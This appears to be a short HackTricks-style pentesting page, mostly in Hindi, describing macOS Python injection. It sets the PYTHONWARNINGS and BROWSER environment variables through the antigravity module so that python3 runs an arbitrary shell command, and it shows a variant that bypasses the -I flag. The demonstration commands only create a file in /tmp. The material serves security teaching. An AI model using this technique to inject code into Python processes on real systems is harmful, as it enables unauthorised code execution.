1000 B

macOS Python Applications Injection

{{#include ../../../banners/hacktricks-training.md}}

PYTHONWARNINGS और BROWSER पर्यावरण चर के माध्यम से

यह संभव है कि दोनों पर्यावरण चर को इस तरह से बदलें कि जब भी python को कॉल किया जाए, मनचाहा कोड निष्पादित हो, उदाहरण के लिए:

# Generate example python script
echo "print('hi')" > /tmp/script.py

# RCE which will generate file /tmp/hacktricks
PYTHONWARNINGS="all:0:antigravity.x:0:0" BROWSER="/bin/sh -c 'touch /tmp/hacktricks' #%s" python3 /tmp/script.py

# RCE which will generate file /tmp/hacktricks bypassing "-I" injecting "-W" before the script to execute
BROWSER="/bin/sh -c 'touch /tmp/hacktricks' #%s" python3 -I -W all:0:antigravity.x:0:0 /tmp/script.py

{{#include ../../../banners/hacktricks-training.md}}